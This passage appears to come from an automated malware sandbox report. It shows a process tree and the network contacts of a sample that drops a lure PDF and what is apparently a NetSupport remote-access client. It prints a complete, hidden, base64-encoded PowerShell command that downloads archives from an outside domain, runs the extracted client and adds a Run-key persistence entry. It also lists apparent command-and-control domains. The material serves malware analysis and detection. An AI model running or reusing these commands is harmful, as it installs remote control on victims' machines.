dzQVZRQXJBQ2NBSUFBbkFDc0FKQUJKQUdzQVRnQktBSElBVGdCWEFEc0FJQUJKQUU0QVZnQnZBRXNBUlFBdEFHVUFXQUJRQUhJQVpRQnpBRk1BU1FCdkFHNEFJQUF0QUVNQVR3Qk5BRTBBUVFCT0FHUUFJQUFrQUVVQVVnQkNBRE1BUXdCUkFESUFPd0I5QURzQUlBQjlBRHNBSUFCOUFEc0FJQUFrQURjQVpnQTFBRzBBZWdCekFGY0FQUUJuQUdVQWRBQXRBR2tBZEFCbEFHMEFJQUFrQURJQWNRQm1BR2dBU1FCdkFHVUFJQUF0QUVZQWJ3QnlBR01BUlFBN0FDQUFKQUEzQUdZQU5RQnRBSG9BY3dCWEFDNEFZUUJVQUZRQVVnQkpBRUlBVlFCVUFHVUFVd0E5QUNjQVNBQnBBR1FBWkFCbEFHNEFKd0E3QUNBQUpBQmhBRUVBVHdCNkFISUFRUUJVQUQwQVNnQnZBR2tBVGdBdEFGQUFRUUIwQUdnQUlBQXRBSEFBWVFCVUFFZ0FJQUFrQURJQWNRQm1BR2dBU1FCdkFHVUFJQUF0QUVNQVNBQkpBR3dBUkFCUUFFRUFWQUJvQUNBQUp3QmpBR3dBYVFCbEFHNEFkQUF6QURJQUxnQmxBSGdBWlFBbkFEc0FJQUJqQUdnQVJBQkpBRklBSUFBa0FESUFjUUJtQUdnQVNRQnZBR1VBT3dBZ0FFNEFaUUJYQUMwQVNRQlVBR1VBVFFCUUFGSUFUd0JRQUdVQVVnQjBBSGtBSUFBdEFGQUFZUUJVQUdnQUlBQW5BRWdBU3dCREFGVUFPZ0JjQUZNQVR3QkdBRlFBVndCQkFGSUFSUUJjQUUwQWFRQmpBSElBYndCekFHOEFaZ0IwQUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUVNQWRRQnlBSElBWlFCdUFIUUFWZ0JsQUhJQWN3QnBBRzhBYmdCY0FGSUFkUUJ1QUNjQUlBQXRBRzRBWVFCTkFFVUFJQUFrQUVrQWJnQkRBRWNBTWdBeUFGWUFTZ0FnQUMwQVZnQmhBRXdBZFFCRkFDQUFKQUJoQUVFQVR3QjZBSElBUVFCVUFDQUFMUUJ3QUhJQWJ3QlFBR1VBY2dCMEFGa0FWQUI1QUZBQVpRQWdBQ2NBVXdCMEFISUFhUUJ1QUdjQUp3QTdBQ0FBY3dCVUFFRUFVZ0IwQUMwQVVBQnlBRThBWXdCRkFITUFVd0FnQUdNQWJBQnBBR1VBYmdCMEFETUFNZ0F1QUdVQWVBQmxBRHNB')); Invoke-Expression $script}"

C:\Windows\SysWOW64\cmd.exe

cmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/871dbc7a2ed62746e6998f48369f81dd/" && (for %F in (*.exe) do start "" "%F")"

C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\vlc.exe

"vlc.exe"

C:\Windows\SysWOW64\explorer.exe

explorer C:\Users\Admin\AppData\Local\Temp\eb6f13698dee2ec5fff6c81b8b88ab63.pdf

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe

C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\eb6f13698dee2ec5fff6c81b8b88ab63.pdf"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nopRo -ExecUTIoNpO BYpaSS -w HId -ec JABpAGUAUQByAGQAOQBkAEMAPQAnAGgAdAB0AHAAcwA6AC8ALwBnAGEAaQBsAHMAYQBjAGEAZABlAG0AeQAuAGMAbwBtAC8AZgB6AGEALwBmADEAYQAuAHoAaQBwACcAOwAgACQASABkAEEAVgB5AHEASAA9AEcAYwBNACAAZQB4AHAAQQBOAGQALQBBAHIAQwBIAEkAVgBlACAALQBFAHIAcgBPAHIAQQBjAFQAaQBPAG4AIABzAEkATABlAE4AVABsAFkAQwBPAG4AVABJAE4AVQBlADsAIAAkAHUAawBYAFgAUgBGAEkAZQA9ACcAbQAzADIAVwBWADUAYgBSAC4AegBpAHAAJwA7ACAAJABSAHIATgBoAEgASQBlAD0AJwBoAHQAdABwAHMAOgAvAC8AZwBhAGkAbABzAGEAYwBhAGQAZQBtAHkALgBjAG8AbQAvAGYAegBhAC8AZgA0AGEALgB6AGkAcAAnADsAIAAkAHMAVQBCAHAAYgBmADgAPQAnAEwATwAxAGkAbgBOAEEALgB6AGkAcAAnADsAIAAkAG4ARQA0AEEATgBMAGYAPQBHAGMATQAgAFMAVABhAHIAVAAtAGIAaQBUAHMAdABSAGEAbgBzAGYAZQByACAALQBlAHIAcgBPAFIAYQBjAFQASQBvAE4AIABTAGkAbABlAE4AVABMAHkAYwBvAE4AVABJAG4AdQBFADsAIAAkAGIAbABiAGUAcAB6AFoAPQAnADYARABNAEwAVQAuAHoAaQBwACcAOwAgACQAUgBnAHoANQBXAEwAbgA9ACcAaAB0AHQAcABzADoALwAvAGcAYQBpAGwAcwBhAGMAYQBkAGUAbQB5AC4AYwBvAG0ALwBmAHoAYQAvAGYAMwBhAC4AegBpAHAAJwA7ACAAWwBuAGUAdAAuAHMARQByAHYAaQBDAEUAUABPAEkATgB0AG0AQQBOAEEARwBFAFIAXQA6ADoAcwBlAEMAdQBSAEkAVABZAHAAUgBPAFQAbwBjAE8AbAAgAD0AIABbAE4AZQB0AC4AcwBFAGMAVQBSAEkAVABZAFAAUgBPAHQATwBjAE8ATAB0AFkAcABlAF0AOgA6AFQATABTADEAMgA7ACAAJABJAG4AQwBHADIAMgBWAEoAPQAnAFQAZQBtAHAAQwBvAG4AdAByAG8AbABsACcAOwAgACQANAB5AEYAYwBKAFYASgA9ACcAbAA4AGUARgBWAE8AUwBTAC4AegBpAHAAJwA7ACAAYwBEACAAJABFAG4AdgA6AEEAcABwAGQAYQB0AGEAOwAgACQARAAzAGcAbABwAD0AJwBoAHQAdABwAHMAOgAvAC8AZwBhAGkAbABzAGEAYwBhAGQAZQBtAHkALgBjAG8AbQAvAGYAegBhAC8AZgAyAGEALgB6AGkAcAAnADsAIAAkAEYAYwBtAFYAVwBzAFkAPQAiACQAZQBOAHYAOgBhAFAAUABkAEEAdABBAFwAJABiAGwAYgBlAHAAegBaACIAOwAgACQAeABIAGYANQB4AG8ATQB1AD0AIgAkAGUATgB2ADoAQQBwAHAARABhAHQAQQBcACQAcwBVAEIAcABiAGYAOAAiADsAIAAkAE4AcwBKAHgAdQBZADgAVAA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJABlAG4AVgA6AEEAUABwAEQAQQB0AEEALAAgACQAdQBrAFgAWABSAEYASQBlADsAIAAkAGQAMABEADcAWQBwAD0ASgBvAEkATgAtAFAAQQBUAGgAIAAtAHAAQQB0AEgAIAAkAGUAbgBWADoAQQBQAHAARABBAHQAQQAgAC0AYwBIAGkATABkAFAAQQB0AGgAIAAkADQAeQBGAGMASgBWAEoAOwAgACQASwBOADYATQBMAHIAbABqAD0AIgBiAGkAdABzAGEAZABNAEkATgAuAGUAWABlACAALwBUAFIAQQBOAFMAZgBlAFIAIAB0AGIAZQBOAGsAIAAvAEQATwBXAG4ATABPAEEARAAgAC8AUAByAGkAbwBSAEkAVABZACAAbgBvAHIAbQBBAEwAIAB7ADAAfQAgAHsAMQB9ACIAIAAtAGYAIAAkAFIAZwB6ADUAVwBMAG4ALAAgACQAeABIAGYANQB4AG8ATQB1ADsAIAAkAHQAQQA1ADAARQA9ACcAQgBJAFQAUwBBAGQAbQBJAE4ALgBFAHgARQAgAC8AVABSAGEATgBTAGYARQByACAAMAB2AGEAaABsACAALwBEAE8AdwBuAEwATwBBAGQAIAAvAHAAcgBpAE8AUgBpAFQAeQAgAE4ATwByAE0AYQBsACAAJwArACQARAAzAGcAbABwACsAJwAgACcAKwAkAEYAYwBtAFYAVwBzAFkAOwAgACQAMgBxAGYAaABJAG8AZQA9ACIAJABFAG4AdgA6AGEAcABwAEQAQQBUAEEAXAAkAEkAbgBDAEcAMgAyAFYASgAiADsAIAAkAGQAdQBuAFQANwBBAFUAPQAiAGIAaQB0AFMAYQBkAG0ASQBuAC4AZQBYAGUAIAAvAHQAUgBBAE4AUwBmAGUAUgAgAFcARABaAHMATwBnACAALwBkAG8AdwBOAEwAbwBBAEQAIAAvAHAAUgBpAG8AcgBpAFQAeQAgAE4AbwBSAE0AQQBsACAAewAwAH0AIAB7ADEAfQAiACAALQBmACAAJABpAGUAUQByAGQAOQBkAEMALAAgACQAZAAwAEQANwBZAHAAOwAgACQAVwBNAGUAbABoAFoASwA9ACIAYgBpAHQAUwBhAGQAbQBJAG4ALgBlAFgAZQAgAC8AdABSAEEATgBTAGYAZQBSACAAVwBEAFoAcwBPAGcAIAAvAGQAbwB3AE4ATABvAEEARAAgAC8AcABSAGkAbwByAGkAVAB5ACAATgBvAFIATQBBAGwAIAAkAFIAcgBOAGgASABJAGUAIAAkAE4AcwBKAHgAdQBZADgAVAAiADsAIABJAEYAIAAoACQASABkAEEAVgB5AHEASAApACAAewAgAGkARgAgACgAJABuAEUANABBAE4ATABmACkAIAB7ACAAcwB0AEEAUgBUAC0AYgBpAFQAUwB0AHIAQQBOAFMARgBFAHIAIAAtAHMATwBVAFIAQwBFACAAJABEADMAZwBsAHAAIAAtAEQAZQBTAFQAaQBOAEEAVABpAE8ATgAgACQARgBjAG0AVgBXAHMAWQA7ACAAcwB0AEEAcgBUAC0AYgBpAFQAcwB0AFIAQQBOAFMARgBFAHIAIAAtAHMATwBVAHIAQwBlACAAJABSAGcAegA1AFcATABuACAALQBkAEUAcwBUAEkATgBBAFQAaQBPAG4AIAAkAHgASABmADUAeABvAE0AdQA7ACAAUwBUAEEAUgB0AC0AQgBJAHQAcwB0AHIAYQBuAFMARgBFAHIAIAAtAHMATwBVAHIAQwBlACAAJABSAHIATgBoAEgASQBlACAALQBEAGUAcwBUAGkATgBhAFQAaQBPAE4AIAAkAE4AcwBKAHgAdQBZADgAVAA7ACAAUwBUAEEAcgBUAC0AQgBJAFQAUwBUAHIAYQBOAHMARgBFAHIAIAAtAHMAbwBVAFIAYwBFACAAJABpAGUAUQByAGQAOQBkAEMAIAAtAGQAZQBzAFQAaQBOAEEAdABJAG8AbgAgACQAZAAwAEQANwBZAHAAOwAgAH0AIABFAGwAUwBlACAAewBpAG4AdgBvAEsAZQAtAGUAWABwAFIAZQBzAFMASQBPAE4AIAAtAEMAbwBNAG0AQQBuAGQAIAAkAEsATgA2AE0ATAByAGwAagA7ACAASQBOAFYAbwBLAEUALQBlAFgAUAByAGUAcwBTAEkAbwBuACAALQBDAE8ATQBNAEEATgBkACAAJAB0AEEANQAwAEUAOwAgAEkARQBYACAALQBDAE8ATQBtAEEAbgBkACAAJABXAE0AZQBsAGgAWgBLADsAIABJAG4AVgBvAEsARQAtAGUAWABQAFIARQBzAFMASQBPAG4AIAAtAEMAbwBtAE0AQQBOAGQAIAAkAGQAdQBuAFQANwBBAFUAOwAgAH0AIABlAFgAcABhAE4AZAAtAGEAUgBDAEgASQBWAEUAIAAtAFAAYQB0AGgAIAAkAHgASABmADUAeABvAE0AdQAgAC0AZABlAHMAdABJAG4AYQBUAEkAbwBuAHAAQQB0AEgAIAAkADIAcQBmAGgASQBvAGUAOwAgAGUAeABQAGEATgBkAC0AQQBSAGMASABpAHYARQAgAC0AcABhAHQASAAgACQATgBzAEoAeAB1AFkAOABUACAALQBkAEUAcwBUAGkATgBBAFQAaQBPAG4AcABhAHQAaAAgACQAMgBxAGYAaABJAG8AZQA7ACAARQB4AHAAQQBuAEQALQBhAHIAYwBoAGkAdgBFACAALQBQAGEAVABoACAAJABGAGMAbQBWAFcAcwBZACAALQBkAEUAcwB0AGkATgBBAHQASQBvAG4AUABhAHQAaAAgACQAMgBxAGYAaABJAG8AZQA7ACAARQB4AFAAYQBuAGQALQBhAHIAQwBIAGkAdgBFACAALQBQAGEAdABIACAAJABkADAARAA3AFkAcAAgAC0ARABlAFMAdABpAG4AQQB0AEkATwBuAFAAYQB0AEgAIAAkADIAcQBmAGgASQBvAGUAOwAgAHIARQBNAE8AVgBlAC0ASQB0AEUAbQAgAC0AcABhAHQAaAAgACQAZAAwAEQANwBZAHAAOwAgAGUAUgBBAHMARQAgAC0AUABhAHQAaAAgACQARgBjAG0AVgBXAHMAWQA7ACAAZQBSAEEAcwBFACAALQBwAGEAdABoACAAJABOAHMASgB4AHUAWQA4AFQAOwAgAFIARAAgAC0AUABhAHQASAAgACQAeABIAGYANQB4AG8ATQB1ADsAIAB9ACAAZQBsAFMARQAgAHsAIAAkAGgAaQBoAFQAWABTAEoAPQAnAGgAdAB0AHAAcwA6AC8ALwBnAGEAaQBsAHMAYQBjAGEAZABlAG0AeQAuAGMAbwBtAC8AZgB6AGYALwAnADsAIABuAEkAIAAtAHAAYQB0AEgAIAAkAGUAbgBWADoAYQBQAFAARABBAFQAYQAgAC0AbgBhAE0ARQAgACQASQBuAEMARwAyADIAVgBKACAALQBpAHQARQBNAFQAeQBQAEUAIAAnAGQAaQByAGUAYwB0AG8AcgB5ACcAOwAgACQAUwBYAFgAdAA0AD0AQAAoACcAQQB1AGQAaQBvAEMAYQBwAHQAdQByAGUALgBkAGwAbAAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGkAbgBpACcALAAgACcATgBTAE0ALgBMAEkAQwAnACwAIAAnAFAAQwBJAEMATAAzADIALgBEAEwATAAnACwAIAAnAFQAQwBDAFQATAAzADIALgBEAEwATAAnACwAIAAnAG4AcwBtAF8AdgBwAHIAbwAuAGkAbgBpACcALAAgACcAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwAsACAAJwBIAFQAQwBUAEwAMwAyAC4ARABMAEwAJwAsACAAJwBuAHMAawBiAGYAbAB0AHIALgBpAG4AZgAnACwAIAAnAG0AcwB2AGMAcgAxADAAMAAuAGQAbABsACcALAAgACcAUABDAEkAQwBIAEUASwAuAEQATABMACcALAAgACcAcABjAGkAYwBhAHAAaQAuAGQAbABsACcALAAgACcAcgBlAG0AYwBtAGQAcwB0AHUAYgAuAGUAeABlACcAKQA7ACAAaQBGACAAKAAkAG4ARQA0AEEATgBMAGYAKQAgAHsAIAAkAFMAWABYAHQANAAgAHwAIABmAG8AUgBlAEEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAJAAxAEwAVgBTAEoAawBVAD0AJABoAGkAaABUAFgAUwBKACsAJABfADsAIAAkAEkAawBOAEoAcgBOAFcAPQBKAG8AaQBuAC0AcABBAHQASAAgAC0AUABBAHQASAAgACQAMgBxAGYAaABJAG8AZQAgAC0AQwBoAGkATABkAFAAQQBUAGgAIAAkAF8AOwAgAFMAdABhAHIAdAAtAEIAaQB0AFMAVAByAEEAbgBzAEYARQBSACAALQBzAG8AdQByAEMAZQAgACQAMQBMAFYAUwBKAGsAVQAgAC0ARABFAFMAVABJAE4AYQB0AEkATwBuACAAJABJAGsATgBKAHIATgBXADsAIAB9ADsAfQAgAGUATABTAEUAIAB7ACAAJABTAFgAWAB0ADQAIAB8ACAAJQAgAHsAIAAkADEATABWAFMASgBrAFUAPQAkAGgAaQBoAFQAWABTAEoAKwAkAF8AOwAgACQASQBrAE4ASgByAE4AVwA9ACIAJAAyAHEAZgBoAEkAbwBlAFwAJABfACIAOwAgACQARQBSAEIAMwBDAFEAMgA9ACcAQgBJAHQAUwBBAEQATQBpAG4ALgBFAFgARQAgAC8AVAByAEEATgBTAGYARQBSACAAcQBWAHQAdgBPACAALwBkAE8AVwBuAGwAbwBBAEQAIAAvAFAAcgBpAE8AcgBJAHQAWQAgAG4ATwByAE0AYQBsACAAJwArACQAMQBMAFYAUwBKAGsAVQArACcAIAAnACsAJABJAGsATgBKAHIATgBXADsAIABJAE4AVgBvAEsARQAtAGUAWABQAHIAZQBzAFMASQBvAG4AIAAtAEMATwBNAE0AQQBOAGQAIAAkAEUAUgBCADMAQwBRADIAOwB9ADsAIAB9ADsAIAB9ADsAIAAkADcAZgA1AG0AegBzAFcAPQBnAGUAdAAtAGkAdABlAG0AIAAkADIAcQBmAGgASQBvAGUAIAAtAEYAbwByAGMARQA7ACAAJAA3AGYANQBtAHoAcwBXAC4AYQBUAFQAUgBJAEIAVQBUAGUAUwA9ACcASABpAGQAZABlAG4AJwA7ACAAJABhAEEATwB6AHIAQQBUAD0ASgBvAGkATgAtAFAAQQB0AGgAIAAtAHAAYQBUAEgAIAAkADIAcQBmAGgASQBvAGUAIAAtAEMASABJAGwARABQAEEAVABoACAAJwBjAGwAaQBlAG4AdAAzADIALgBlAHgAZQAnADsAIABjAGgARABJAFIAIAAkADIAcQBmAGgASQBvAGUAOwAgAE4AZQBXAC0ASQBUAGUATQBQAFIATwBQAGUAUgB0AHkAIAAtAFAAYQBUAGgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAG4AYQBNAEUAIAAkAEkAbgBDAEcAMgAyAFYASgAgAC0AVgBhAEwAdQBFACAAJABhAEEATwB6AHIAQQBUACAALQBwAHIAbwBQAGUAcgB0AFkAVAB5AFAAZQAgACcAUwB0AHIAaQBuAGcAJwA7ACAAcwBUAEEAUgB0AC0AUAByAE8AYwBFAHMAUwAgAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlADsA

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8D71D573560E32968EF1981A54ED4FC2 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=299A91C9F9ECD525CC4DBC58E58975A9 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=299A91C9F9ECD525CC4DBC58E58975A9 --renderer-client-id=2 --mojo-platform-channel-handle=1784 --allow-no-sandbox-job /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D86844620FECBE686E79171D2482E499 --mojo-platform-channel-handle=2308 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D8CBFF90D2EC00165F884839663695C7 --mojo-platform-channel-handle=2436 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=59D23AEE6ACCFB1DBEA77E181ECE51BF --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=59D23AEE6ACCFB1DBEA77E181ECE51BF --renderer-client-id=6 --mojo-platform-channel-handle=2316 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=105BE7FF81EF69CC890FA6834CAC8A6D --mojo-platform-channel-handle=2692 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Users\Admin\AppData\Roaming\TempControll\client32.exe

"C:\Users\Admin\AppData\Roaming\TempControll\client32.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 45.61.158.86:80 45.61.158.86 tcp
US 8.8.8.8:53 86.158.61.45.in-addr.arpa udp
US 8.8.8.8:53 gailsacademy.com udp
NL 23.254.231.157:443 gailsacademy.com tcp
US 8.8.8.8:53 157.231.254.23.in-addr.arpa udp
US 8.8.8.8:53 fusion-avto.com udp
CH 94.247.42.62:443 fusion-avto.com tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
US 104.26.1.231:80 geo.netsupportsoftware.com tcp
US 104.26.1.231:80 geo.netsupportsoftware.com tcp
US 104.26.1.231:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 62.42.247.94.in-addr.arpa udp
US 8.8.8.8:53 231.1.26.104.in-addr.arpa udp
US 8.8.8.8:53 135.240.123.92.in-addr.arpa udp
US 8.8.8.8:53 107.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 availabkelk.store udp
US 8.8.8.8:53 questionsmw.store udp
US 8.8.8.8:53 soldiefieop.site udp
